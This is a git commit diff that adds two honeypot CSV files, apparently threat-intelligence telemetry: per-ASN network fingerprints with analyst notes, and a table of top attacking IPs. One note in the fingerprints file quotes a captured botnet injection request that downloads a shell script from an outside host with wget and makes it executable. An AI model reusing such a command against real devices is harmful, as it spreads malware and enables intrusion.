diff options
| author | hrbrmstr <bob@rud.is> | 2026-07-20 07:23:29 -0400 |
|---|---|---|
| committer | hrbrmstr <bob@rud.is> | 2026-07-20 07:23:29 -0400 |
| commit | 805ce54d6b181cdaab453e7e50cfac14cc371b6a (patch) | |
| tree | c04619314bcaf6eaa728a670f4de97c9aa45a26c /kevlar/2026-07-20/honeylabs | |
| parent | a47b685eac21aeedad5c4ab5df5c67a1df905486 (diff) | |
chore: weekly asn update
Diffstat (limited to 'kevlar/2026-07-20/honeylabs')
| -rw-r--r-- | kevlar/2026-07-20/honeylabs/fingerprints.csv | 33 | ||||
| -rw-r--r-- | kevlar/2026-07-20/honeylabs/top-attackers.csv | 37 |
2 files changed, 70 insertions, 0 deletions
diff --git a/kevlar/2026-07-20/honeylabs/fingerprints.csv b/kevlar/2026-07-20/honeylabs/fingerprints.csv new file mode 100644 index 0000000..cb63736 --- /dev/null +++ b/kevlar/2026-07-20/honeylabs/fingerprints.csv @@ -0,0 +1,33 @@ +asn,asn_org,source_ip,fingerprint_type,fingerprint,ssh_banner_ua,tls_version,notes +AS57043,Hostkey B.v.,132.243.194.215,ja4h,ge11nn0400_777e992b8532,,,"IoT MIPS downloader GET /shell?cd+/tmp;rm+-rf+kla.sh;wget+http://aibotnet.su/bins/kla.sh;chmod+777+./kla.sh -- NEW this week vs HASSH libssh_0.9.6 last week (different IP)" +AS57043,Hostkey B.v.,132.243.194.215,ua,Mozilla/5.0,,,"Generic Mozilla UA on botnet callback port 6001" +AS51396,Pfcloud UG,various,ua,Go-http-client/1.1,,,"3 IPs - dominant in 8080/3128/3000/9090/8443 scanning" +AS51396,Pfcloud UG,various,ua,Mozilla/5.0 zgrab/0.x,,,"3 IPs - 8081/3001/3000 scanning" +AS51396,Pfcloud UG,various,ua,odin-scanner/0.4,,,"NEW THIS WEEK -- 38 events, scans 20128/11235 'Hello World' on port 80" +AS51396,Pfcloud UG,various,ua,Hello World,,,"12 events, port 80 <-- distinctive minimalistic UA suggesting custom tooling" +AS51396,Pfcloud UG,204.76.203.18,hassh-server,425d29fe50d8e4f5e37efb6e24bcf660,SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u7,,Censys-enriched server-side HASSH; this is the lead of the 204.76.203.x cluster (13K+ sponge sessions) +AS51396,Pfcloud UG,204.76.203.18,ja4tscan,65160_2-1-1-4-1-3_1460_10_1-2,,,"Distinctive TCP fingerprint MTU 42340 -- not the default Ubuntu 65160 -- appears custom-tuned (smaller MSS)" +AS51852,Private Layer INC,81.17.28.130,hassh-server,41ff3ecd1458b0bf86e1b4891636213e,SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.15,,NEW primary Honeylabs IP this week (vs 179.43.134.114 prior; prior week same OpenSSL but 0.10 suffix - upgrade) +AS51852,Private Layer INC,81.17.28.130,ua,Chrome/144.0.0.0 Safari/537.36,,,"HTTP HEAD / scanning via Windows Chrome 144 -- 252 events over 5 days" +AS51852,Private Layer INC,179.43.186.240,ua,Go-http-client/1.1,,,"6 events HTTP scanning port 443" +AS30823,aurologic GmbH,41.216.188.21,ja4,t13i190800_9dc949149365_97f8aa674fd9,,TLSv1.3,JA4 base 9dc949149365 -- SAME JA4 as FLOKINET Tor exit (AS200651); the 190800 i-form means TLS 1.3 + i08 (single cipher only) +AS30823,aurologic GmbH,41.216.188.21,ja3,19e29534fd49dd27d09234e639c4057e,,TLSv1.3,Distinct JA3 baseline +AS30823,aurologic GmbH,41.216.188.21,ja4h,ge11nn0500_9af7e0472034,,HTTP,Android Chrome 76 mobile UA (decoy or legitimate mobile) +AS200651,FlokiNET ehf,185.100.87.136,hassh-client,e54ef3ec27fe1fea7ab64d3fa05359fd,SSH-2.0-OpenSSH_10.2p1,,UPGRADED from OpenSSH_10.1 last week (subtle 0.1 bump) -- same client HASSH (OpenSSH_10.x series shares HASSH) +AS200651,FlokiNET ehf,185.100.87.136,hassh-server,b1bff636ebbdbaa9dd2ad97fd173c956,SSH-2.0-OpenSSH_9.9,,Server-side OpenSSH_9.9 on port 7288 (alt SSH port -- furtive) +AS200651,FlokiNET ehf,185.100.87.136,ja4,t13i1909h2_9dc949149365_97f8aa674fd9,,TLSv1.3,Same JA4 as 2026-07-13 (stable) +AS200651,FlokiNET ehf,185.100.87.136,ja3,7c1e207beb00684bbbe144f1b0abe1d5,,TLSv1.3,Same JA3 as 2026-07-13 (stable) +AS200651,FlokiNET ehf,185.100.87.136,ja4h,ge11nn0400_88d30a62b7ad,,HTTP,Same JA4H as 2026-07-13 (stable) +AS200651,FlokiNET ehf,185.100.87.136,ja4h,po11nn0600_c9506d37ac14,,HTTP,NEW this week -- associated with SPARK COMMIT: 08059e95... UA + content-type: application/octet-stream body (CVE-style implant reporting) +AS200651,FlokiNET ehf,185.100.87.136,jarm,2ad2ad16d2ad2ad00042d42d000000332dc9cd7d90589195193c8bb05d84fa,,Tor exit TLS 1.3 256gcm + cipher suite resolution +AS198953,Proton66 OOO,176.120.22.16,greynoise,suspicious,,,"GreyNoise classifies suspicious -- tags: MySQL Protocol, TLS Crawler, Python requests client, Generic Suspicious Linux Command" +AS214940,Kprohost LLC,77.83.39.119,hassh-server,41ff3ecd1458b0bf86e1b4891636213e,SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.16,,"SHARED HASSH across all Ubuntu OpenSSH 8.9p1 in this block -- fleet uniformity" +AS214940,Kprohost LLC,77.83.39.119,greynoise,malicious,,,"Classified malicious by GreyNoise -- tags: Web Crawler, TLS Crawler, ENV Crawler (.env!), GoogleBot pretender, Java HTTP client" +AS210644,Aeza Group LLC,various,no-honeylabs-data,,,"0 honeypot events this week -- prior week single event from 46.226.162.205 has vanished" +AS209847,(real AS41745 FORTIS),45.144.28.70,hassh-server,41ff3ecd1458b0bf86e1b4891636213e,SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.16,+ SSH,STILL shared Ubuntu 8.9p1 HASSH with AS214940; network creation 2026-06-06 (very new BGP) -- GreyNoise malicious: HTTP OPTIONS crawler, Go HTTP client, Generic Brute Force, TLS Crawler +AS209847,(real AS41745 FORTIS),45.144.28.70,ja4tscan,65160_2-4-8-1-3_1460_7_1-2,,Ubuntu default MTU 65160 (no anti-fingerprint tuning) +AS211720,Datashield Inc.,185.231.33.46,jarm,07d19d12d21d21d07c42d43d000000f50d155305214cf247147c43c0f1a823,,Server-side JARM -- distinctive fingerprint; TLS 1.0/1.1 still enabled (DOWNGRADE possible misconfig) +AS211720,Datashield Inc.,185.231.33.46,cert-cn,prohaska.beatty.biz,,,"Self-signed cert -- CN=prohaska.beatty.biz, O=Prohaska-Beatty, OU=compress, ST=HI, C=US, emailAddress=compress@prohaska.beatty.biz" +AS14956,RouterHosting LLC,216.126.239.17,hassh-server,e42184b06d45385a906f0803d04c83da,SSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13.18,,OpenSSH 9.6 (more current than peers; security-conscious maintenance) +AS14956,RouterHosting LLC,216.126.239.17,ua,PMTA-Auto,,,"PowerMTA mail bruteforce scanner UA; 55 events over 4 days on ports 9900/2698/12124/2156/4071 - proxy brute" +AS14956,RouterHosting LLC,216.126.239.17,wkzeug-fofa,"Werkzeug/3.1.8 Python/3.12.3 / WWW-Authenticate: Basic realm=fofa_monitor",,Distinctive misconfiguration: HTTP 401 with fofa_monitor Basic realm -- Censys flagged as Unencrypted HTTP Weak Auth (high severity)
\ No newline at end of file diff --git a/kevlar/2026-07-20/honeylabs/top-attackers.csv b/kevlar/2026-07-20/honeylabs/top-attackers.csv new file mode 100644 index 0000000..f2e40bb --- /dev/null +++ b/kevlar/2026-07-20/honeylabs/top-attackers.csv @@ -0,0 +1,37 @@ +asn,asn_org,source_ip,event_count,first_seen,last_seen,top_ports,country +AS57043,Hostkey B.v.,132.243.194.215,3,2026-07-16T00:21:43,2026-07-16T03:43:00,"6001",DE +AS14956,RouterHosting LLC,216.126.239.17,55,2026-07-13T10:55:23,2026-07-17T15:31:29,"8181,2930,5555,9999,2065",US +AS14956,RouterHosting LLC,172.86.123.136,40,2026-07-14T11:50:06,2026-07-14T20:27:40,"445",US +AS14956,RouterHosting LLC,144.172.104.239,18,2026-07-14T02:38:00,2026-07-19T03:19:38,"25565",US +AS14956,RouterHosting LLC,172.86.89.13,8,2026-07-15T16:12:52,2026-07-15T16:12:56,"445",US +AS14956,RouterHosting LLC,45.61.148.157,3,2026-07-13T13:52:21,2026-07-13T16:32:27,"443",US +AS51396,Pfcloud UG,45.135.193.193,491,2026-07-13T00:22:51,2026-07-19T18:36:25,"8080,8081,8888,8000,3128",DE +AS51396,Pfcloud UG,176.65.148.25,473,2026-07-13T00:02:32,2026-07-13T19:14:08,"10112,4142,33392,20002,3361",NL +AS51396,Pfcloud UG,204.76.203.81,264,2026-07-14T20:54:31,2026-07-18T16:52:54,"34567,17000,6036,80,8080",NL +AS51396,Pfcloud UG,204.76.203.49,222,2026-07-13T00:04:47,2026-07-19T17:52:32,"7777,777,8888,9999,10000",NL +AS51396,Pfcloud UG,176.65.149.30,119,2026-07-13T00:15:43,2026-07-19T21:56:31,"30875,30876,30878,30893,30897",NL +AS51396,Pfcloud UG,176.65.149.212,118,2026-07-13T00:45:08,2026-07-19T21:11:13,"6873,6842,6843,6870,6844",NL +AS51396,Pfcloud UG,176.65.149.27,116,2026-07-13T00:36:48,2026-07-19T23:17:17,"36870,36871,36872,36902,36873",NL +AS51396,Pfcloud UG,176.65.149.31,103,2026-07-13T00:51:38,2026-07-19T23:59:54,"802,801,800,894,889",NL +AS51396,Pfcloud UG,204.76.203.30,90,2026-07-15T06:32:29,2026-07-19T19:11:51,"3128,8080,9090,3000,8443",NL +AS51396,Pfcloud UG,176.65.148.144,75,2026-07-13T00:05:10,2026-07-19T20:28:11,"8080,3128,4145,11089,9999",NL +AS51396,Pfcloud UG,176.65.134.3,71,2026-07-13T01:18:03,2026-07-19T21:03:39,"4145,4153,3629,8080,3128",DE +AS51396,Pfcloud UG,176.65.148.2,69,2026-07-13T01:14:14,2026-07-19T22:10:10,"4145,5678,1080,8080,7890",NL +AS51396,Pfcloud UG,176.65.148.184,59,2026-07-13T00:45:10,2026-07-17T00:15:58,"11235,20128",NL +AS51396,Pfcloud UG,45.135.194.10,55,2026-07-13T00:34:55,2026-07-19T23:30:47,"999,4153,8118,8080,3629",DE +AS51852,Private Layer INC,81.17.28.130,255,2026-07-13T15:58:43,2026-07-19T14:15:34,"443,135",CH +AS51852,Private Layer INC,179.43.186.240,6,2026-07-18T18:44:26,2026-07-19T00:02:54,"443",CH +AS51852,Private Layer INC,179.43.168.58,3,2026-07-19T09:06:49,2026-07-19T20:02:47,"135",CH +AS200651,FlokiNET ehf,185.100.87.136,18,2026-07-13T02:11:12,2026-07-19T22:31:18,"443,80,2222,444",RO +AS200593,Prospero Ooo,91.202.233.79,968,2026-07-13T23:49:25,2026-07-14T03:56:23,"3558,3392,3636,6666,3388",TM +AS200593,Prospero Ooo,91.215.85.104,1,2026-07-17T21:22:19,2026-07-17T21:22:19,"443",RU +AS214940,Kprohost LLC,77.83.39.119,31,2026-07-14T01:10:44,2026-07-19T12:16:47,"443,80",UA +AS214940,Kprohost LLC,77.83.39.42,6,2026-07-15T13:22:26,2026-07-19T14:59:10,"443",UA +AS214940,Kprohost LLC,77.83.39.94,5,2026-07-16T22:15:21,2026-07-17T17:27:00,"443",UA +AS198953,Proton66 OOO,176.120.22.61,793,2026-07-13T09:28:33,2026-07-17T07:23:42,"43,7788,5433,9999,443",RU +AS198953,Proton66 OOO,193.143.1.66,18,2026-07-14T18:01:30,2026-07-15T13:29:16,"3389,3396,3395,3399",RU +AS198953,Proton66 OOO,176.120.22.192,11,2026-07-18T08:35:31,2026-07-18T08:48:53,"1433",RU +AS198953,Proton66 OOO,37.77.150.83,3,2026-07-14T09:22:28,2026-07-14T09:22:28,"6379",RU +AS198953,Proton66 OOO,176.120.22.240,2,2026-07-13T11:37:43,2026-07-14T11:03:45,"9933,6379",RU +AS211720,Datashield Inc.,185.231.33.46,2,2026-07-16T22:21:02,2026-07-18T01:00:29,"1433",SC +AS30823,aurologic GmbH,41.216.188.21,1,2026-07-14T19:24:45,2026-07-14T19:24:45,"443",DE
\ No newline at end of file |
